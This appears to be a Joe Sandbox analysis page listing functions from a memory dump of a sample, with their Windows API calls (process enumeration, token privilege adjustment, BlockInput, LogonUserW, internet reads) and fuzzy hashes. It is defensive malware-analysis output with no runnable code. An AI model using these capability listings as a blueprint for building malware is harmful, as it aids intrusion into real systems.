Opcode Fuzzy Hash: f510f2a51ff9f9497ecb210527fa56d88857f4f7a8141949ec628a7806d4cec8
Instruction Fuzzy Hash: D411C472700A20AFE7215F66DC44A6F7799EFCE721B455429F846FB241CB30BD018AA5

Function 00E9C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E61D88,?), ref: 00E9C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E9C324

Strings

GetSystemWow64DirectoryW, xrefs: 00E9C31E
kernel32.dll, xrefs: 00E9C30D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 9f207ae724c368eeffe7dea3c8f3654babf475de03a0255c16aba89526d3b256
Instruction ID: 5b930eaa5769bfb1a79d3b2469f735d5c43d7529fd11bc0a84102f928ca9c68e
Opcode Fuzzy Hash: 9f207ae724c368eeffe7dea3c8f3654babf475de03a0255c16aba89526d3b256
Instruction Fuzzy Hash: C9E0C270200703CFDF30AF66C804A8676E4EF1D749B90E47AE895F2250E770E841CB60

Function 00E9F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00E9F151
Process32FirstW.KERNEL32(00000000,?), ref: 00E9F15F

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

Process32NextW.KERNEL32(00000000,?), ref: 00E9F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E9F22E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: a561b07d7ffd8a234f1728b93c5e37cee93aa834a311f2697c9002ca40a18e70
Instruction ID: 00372842d35f0f3073cba6fad738a7bf33b00aa45e25183597c73260789d058d
Opcode Fuzzy Hash: a561b07d7ffd8a234f1728b93c5e37cee93aa834a311f2697c9002ca40a18e70
Instruction Fuzzy Hash: DD5160B15043119FD710EF24EC86E6BB7E8FF98710F14582DF595A7262EB70A908CB92

Function 00E840B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E840D1
_memset.LIBCMT ref: 00E840F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E84144
CloseHandle.KERNEL32(00000000), ref: 00E8414D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: f4ab375016ef5e6bb436ffa208157dafcb13be9673004561f502e2ffed45480e
Instruction ID: 3e95daef6ce1d9ade16a91c929678facd9bef6e3db8a4bc0250061ea60c9b5dd
Opcode Fuzzy Hash: f4ab375016ef5e6bb436ffa208157dafcb13be9673004561f502e2ffed45480e
Instruction Fuzzy Hash: 7111EBB59012287AD7305BA5AC4DFABBB7CEF45760F104296F908E7180D6744E848BA4

Function 00E7EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E7EB19

Strings

|, xrefs: 00E7EB49
(, xrefs: 00E7EB5F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 45dca617dd7b7d8dc9b685e41653f5490be658c5c6a98215c686a6960f27af9c
Instruction ID: 7bf952681181e0e01b54aee95f698eeb82cb677e61197a1facb0bb021457248a
Opcode Fuzzy Hash: 45dca617dd7b7d8dc9b685e41653f5490be658c5c6a98215c686a6960f27af9c
Instruction Fuzzy Hash: BC322675A006059FD728CF29C481A6AB7F1FF48310B15D5AEE89AEB7A1E770E941CB40

Function 00E925E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00E926D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E9270C

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 2e7175d99139da6cda8a82afafee1d82c4a3efc59ed39eb9fc60cd6ae9c68906
Instruction ID: da4c76dcaa25001f3f855fa9b0897e8948714ccd6a2803ece6539b8cd2a5b3e1
Opcode Fuzzy Hash: 2e7175d99139da6cda8a82afafee1d82c4a3efc59ed39eb9fc60cd6ae9c68906
Instruction Fuzzy Hash: 8B41E275A00209BFEF20DE94DC85EBBB7FCEB40728F10506EF701B6541EA71AE819664

Function 00E8B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E8B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E8B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E8B655

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: def506fefbd428c142762faf683511a708badfd13e7fb38c342a6348043091b1
Instruction ID: b2ed4ef68b1d1d775feb7a6fe8b6294081b54ac03bfeeb8a617090c65f3b1b6d
Opcode Fuzzy Hash: def506fefbd428c142762faf683511a708badfd13e7fb38c342a6348043091b1
Instruction Fuzzy Hash: 51219275A00118EFCB00EF95D881AADBBF8FF49310F0480A9E809BB351DB31A905CB50

Function 00E78CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00E40FF6: std::exception::exception.LIBCMT ref: 00E4102C
Part of subcall function 00E40FF6: __CxxThrowException@8.LIBCMT ref: 00E41041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E78D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E78D3A
GetLastError.KERNEL32 ref: 00E78D47

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: c977e4dbe5ce4a771e7bc9a2b1d56ae88afabd9dfecc219aaeacdcaa9e1fef95
Instruction ID: a2cdccf908dcf0ee2da24f88dbee781a4a3da7e420fcd6edaa14c685a9fb8677
Opcode Fuzzy Hash: c977e4dbe5ce4a771e7bc9a2b1d56ae88afabd9dfecc219aaeacdcaa9e1fef95
Instruction Fuzzy Hash: 61118FB1514209AFD7289F64ED89D6BB7FCEB58711B20852EF55AA3241EF30BC448A60

Function 00E84C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E84C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E84C43
FreeSid.ADVAPI32(?), ref: 00E84C53

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 718c39e9d8dc17d6fa3b5494c931f1400d04af47cbc869e7f2a239d3367e6a34
Instruction ID: f19c2b255fd2e05cdddd24c927f2922aa8ee275b8079fc6a53420bc7f41c55f2
Opcode Fuzzy Hash: 718c39e9d8dc17d6fa3b5494c931f1400d04af47cbc869e7f2a239d3367e6a34
Instruction Fuzzy Hash: 37F04975A1130DBFDF04DFF0DC89AAEBBBCEF08201F0044A9E905E2181E6706A088B50

Function 00E88B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00E88B25

Part of subcall function 00E4543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E891F8,00000000,?,?,?,?,00E893A9,00000000,?), ref: 00E45443
Part of subcall function 00E4543A: __aulldiv.LIBCMT ref: 00E45463

Strings

0u, xrefs: 00E88B1C

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0u
API String ID: 2893107130-1339160046
Opcode ID: fa2ffb924df2bc685ccb1c004b497b9b6628f855d975e517cf76f1d4c7e6142b
Instruction ID: 5949da2d87a76acd258aa077236514939d25cd8ec133ce56b3ee39b8300808dd
Opcode Fuzzy Hash: fa2ffb924df2bc685ccb1c004b497b9b6628f855d975e517cf76f1d4c7e6142b
Instruction Fuzzy Hash: 3121D2726356108FC729CF25D441A52B3E1EBA4311B689E6CE4E9DF2D0CA34B909CB94

Function 00E2E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2468f9b8e4885aae551dd77e02039188650b6f9ca5b2bc70224b83a277ee0139
Instruction ID: a9cf9056d07fef5f6a201c592b35aa2534fd6fcfad3f0aca374636c7871e136f
Opcode Fuzzy Hash: 2468f9b8e4885aae551dd77e02039188650b6f9ca5b2bc70224b83a277ee0139
Instruction Fuzzy Hash: F4229C75A00235CFDB24DF64E481AAEB7F0FF08304F18A169E856BB351E774A985CB91

Function 00E8C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00E8C966
FindClose.KERNEL32(00000000), ref: 00E8C996

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 23ef575db7f584f8b1333f98897c40d4b66a940d6920f9cf74f2da7de0fd4d77
Instruction ID: c73678f3e2e5767d5a40ceba6b31b411a810255ca2ced0abc56aa2dd337d53c4
Opcode Fuzzy Hash: 23ef575db7f584f8b1333f98897c40d4b66a940d6920f9cf74f2da7de0fd4d77
Instruction Fuzzy Hash: 971188716106109FD710EF29D845A2AF7E5FF89324F10995EF9A9E7291DB30AC04CB91

Function 00E8A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E9977D,?,00EAFB84,?), ref: 00E8A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E9977D,?,00EAFB84,?), ref: 00E8A314

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: d8fa20b5a25f4f45a35eb3ec62c53a61dd2204316221ac1b310619a2562b729f
Instruction ID: 6937312544830726e6a59bdb702702611b123052ac8927f418a670168e311dbc
Opcode Fuzzy Hash: d8fa20b5a25f4f45a35eb3ec62c53a61dd2204316221ac1b310619a2562b729f
Instruction Fuzzy Hash: 25F0823554422DBBEB20AFA4CC48FEA776DBF09762F004166F90CE6191DA309944CBE1

Function 00E78713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E78851), ref: 00E78728
CloseHandle.KERNEL32(?,?,00E78851), ref: 00E7873A

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 719817e438f68086a6ac17f13f397f6984fffe7e87b07cb64fda87bdb02c1b65
Instruction ID: 88a9003139f371cd2479e206629af999442a405a6760d66f2632da8eddf620ac
Opcode Fuzzy Hash: 719817e438f68086a6ac17f13f397f6984fffe7e87b07cb64fda87bdb02c1b65
Instruction Fuzzy Hash: 69E04632000600EEEB252B61FC08D737BE9EB043907208829F49690430CB22ACD0EB10

Function 00E4A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E48F97,?,?,?,00000001), ref: 00E4A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E4A3A3

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c70f6f41903ce286067daac7a33abea0a6775015d72984eaef106883bc9d525a
Instruction ID: 3f3f3d6475aa17ca26b441ca6937aaacdb3f14940dd08c31ca965f2c511f6829
Opcode Fuzzy Hash: c70f6f41903ce286067daac7a33abea0a6775015d72984eaef106883bc9d525a
Instruction Fuzzy Hash: 9AB09231054208AFCF002BD2EC59B883F68EB4AAA2F404020F60D94060CBA264588A91

Function 00E4F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9989e095e12dc7eac39c52c208ee5718c712ea4c8b4cc814acb56b93ad97cafc
Instruction ID: 6dbfcfb1901805bf189e05241140cb09abd1f2a152db1fc48ad4dc7cf8dc36bf
Opcode Fuzzy Hash: 9989e095e12dc7eac39c52c208ee5718c712ea4c8b4cc814acb56b93ad97cafc
Instruction Fuzzy Hash: 80321422D69F014DDB239635E872336A289EFB77D4F15E737E819B5DA6EB28C4834100

Function 00E5267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dc90ee0201916ccd8acf62b762ca36e71dca2b53afeb96544d28dfde76eb3b0
Instruction ID: cec26deef235c6c62ac54328bee518acc09f3ff8239c761efd0464c24a04d0bd
Opcode Fuzzy Hash: 4dc90ee0201916ccd8acf62b762ca36e71dca2b53afeb96544d28dfde76eb3b0
Instruction Fuzzy Hash: 7DB1E120D2AF414DD723963A8831337BA9CAFBB2D5F55D72BFC2674D22EB2185874141

Function 00E941FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00E94218

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: c64148aca65851c6a37b4951bac1f643bf14c7e248fa983ce17c80c5ec8bac9f
Instruction ID: 848029cb9d30b1545457c80d5e8295b6af69cc6169ab571f4ad96fb1c2d0b22f
Opcode Fuzzy Hash: c64148aca65851c6a37b4951bac1f643bf14c7e248fa983ce17c80c5ec8bac9f
Instruction Fuzzy Hash: 42E048B12402149FD710DF59E445E9AF7D8BF98760F009025FC49E7362DA70E8418B90

Function 00E84EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E84F18

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: ad0b71cbde3b80f8675b4442b5a95d7cc1c74716d6f4473b77e52d9e6833bde9
Instruction ID: 3349b3b17dc7da33eda215529b0b7e6884847615ef6ee5df7dafda3ce6c6c932
Opcode Fuzzy Hash: ad0b71cbde3b80f8675b4442b5a95d7cc1c74716d6f4473b77e52d9e6833bde9
Instruction Fuzzy Hash: 09D05EF03642073CFC196B20AC0FFB61108F340785F84798D730DB94C1A9E56C00A235

Function 00E78C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E788D1), ref: 00E78CB3

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
